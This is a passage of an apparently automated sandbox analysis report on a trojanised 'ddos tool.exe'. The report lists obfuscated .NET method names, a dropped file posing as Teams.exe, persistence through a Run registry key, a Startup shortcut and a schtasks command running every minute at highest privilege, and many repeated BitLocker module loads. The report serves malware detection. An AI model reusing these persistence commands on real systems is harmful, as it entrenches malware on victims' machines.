                  Source: SystemUser.dll.4.dr, RDx4hRwz6aSzmOHct93qaa3Naoe.csHigh entropy of concatenated method names: 'CqGUhGSbrCIE9Esu89R8rYgTpcU', 'SkipBpPZfd1xV3OZErwu4Mr6noM1foNLFBqImRZ4I6XWgiDEz5jcGq1GfQ5inBDI7xx5jK6WA1BYQ', 'js755ZKKjysegVUes7hNGQ8HGIgqycGjyFkCaEBMcNDPeSglAt3uXL7fcfV87uGhLOcMycOPyILOs', 'jDNPWHzT0lD8QucZ8O66JeriCrKRPCP77EHQYDD5C5pgg80AtObOjfy2Plj61s2iN0IMsHY7qm8Yg', 'Q548l6LtkyxQ2KHSgIMU28edHO6Gji26ijkAampAgK4wrHyabzFtVjMkwcETCT0U8bS16ZtJcE18I'
                  Source: SystemUser.dll.4.dr, bimUsjvre7ZstFKFZOMuKgeRCCJ.csHigh entropy of concatenated method names: 'KB1plCzwm5KSWB8g4bh5cAff4n3', 'iIWQSUlfQQwGQXan1MCDzc7qMej', 'OxSs7BqUzFcG8WIyBGVqhGk8mso', 'esEOB5TIESqbXzIRmqnq3e6BBZa', 'EAwWnFu6LX84Rf8FrwPqDRj5PQl', 'jLlADAHUkcwH4IBgtudCS7YNHNs', 'smJiKMnLt1J4961qnN5v4bmlbcX', 'toxqodopMsWrYL8wMW22lPxDhnS', 'jw6tCoCULQDD1144TMZijzhRifk', 'Ziuxsoia4sfBhtvKSTc8bj7qlNR'
                  Source: SystemUser.dll.4.dr, jEcc1xMdqIs4N262dHV4lOuG2YH.csHigh entropy of concatenated method names: 'fFtjXHpU60Sk6HD1weHC3X4uxYo', 'GOPUxmLbK1VVJ5jMuE6BxFMDM3l', 'dfQLLoaTTklM9jGX0aXmFCksBnB', '_7iCewZid5Uei6ZAHs0OdeJJv3jH', 'Bqtt9mffMPevUKRHeZqQzbez3WRaMHhFEavgQJIIxlLmEws3J1dSGK2uNfrZY0LmvD1OxrYbfviZZ', 'lQwLd9yy5oz2WXULcXtzzHLW8njJ2DEUB57qot06NnYuiDe1IOapRTlOEi9GZeMC9aGegfpeRel4j', '_5Fp4RFESDlkuBl6PLQL5prXbQmz35cQBz2RVpObslMWvSHl7SlBo2NyPQbtF54EQfgcr4OPplH4AO', 'nob02yMFYfS5RwC2UyQEbIyxNR42kqadjFuTspUXaNHS5MmZeoauUODDUnPjBBFqbdZuYPuSyqvYo', 'ST07Ax4jGlc6s9PI4ciJaOqd9dlCNvvSeHnY9UM9IccVLz9OdFRl4BekQ4SHSXMvhZafuNB0bxn7w', 'NGpg3JT62UXMvKIocSeS7aKwajQ8cCzODW9At2oRl7ouGEe5lqqiH6Cof4qBTMj10vdBcFaSTXAOp'
                  Source: SystemUser.dll.4.dr, 4CfOXREK3ocXQ3Rlng65ZiKxcuc.csHigh entropy of concatenated method names: 'yg9ZOdTjxdnJOd6T33FwPxWgqnN', 'exOPlnKW0tLQS3bZQVINnPDURUu', 'kwt1IQMiCp6SsJFpQqgbVNvxjyP', 'r1OYVxUh6YNVuPTNv21TxDUPxIs', 'dQaNekLtVOXMZiUBPlpWEZAlj6I', '_3JT7XhG1ORVYD6J72Y4QmaWBa7k', 'f2SxCiMl4v0i4fjePuUzDZdfcwP', 'ufBKBgJ5dnpWZXO3u4WHw6N1dt3', 'Atw9N4fhdP6QpWm4vmvNJcph5t4', 'jTh4AVok95ugDIw3pDbpPRPbvEI'
                  Source: C:\Users\user\Desktop\ddos tool.exeFile created: C:\Users\user\AppData\Local\Temp\Teams.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeFile created: C:\Users\user\AppData\Local\Temp\SystemUser.dllJump to dropped file

                  Boot Survival

                  barindex
                  Creates autostart registry keys with suspicious values (likely registry only malware)
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SystemUser C:\Users\user\AppData\Local\Temp\SystemUser.dllJump to behavior
                  Uses schtasks.exe or at.exe to add and modify task schedules
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "SystemUser" /tr "C:\Users\user\AppData\Local\Temp\SystemUser.dll"
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SystemUser.lnkJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SystemUser.lnkJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SystemUserJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SystemUserJump to behavior

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Loading BitLocker PowerShell Module
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\27704828C8BCBA00F78A CC52384910CEE944DDBCC575A8E0177BFA6B16E3032438B207797164D5C94B34Jump to behavior
                  Source: C:\Users\user\Desktop\ddos tool.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\ddos tool.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\ddos tool.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\ddos tool.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\ddos tool.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\ddos tool.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\ddos tool.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\ddos tool.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\ddos tool.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\ddos tool.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\ddos tool.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\ddos tool.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\ddos tool.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\ddos tool.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\ddos tool.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\ddos tool.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\ddos tool.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\ddos tool.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\ddos tool.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
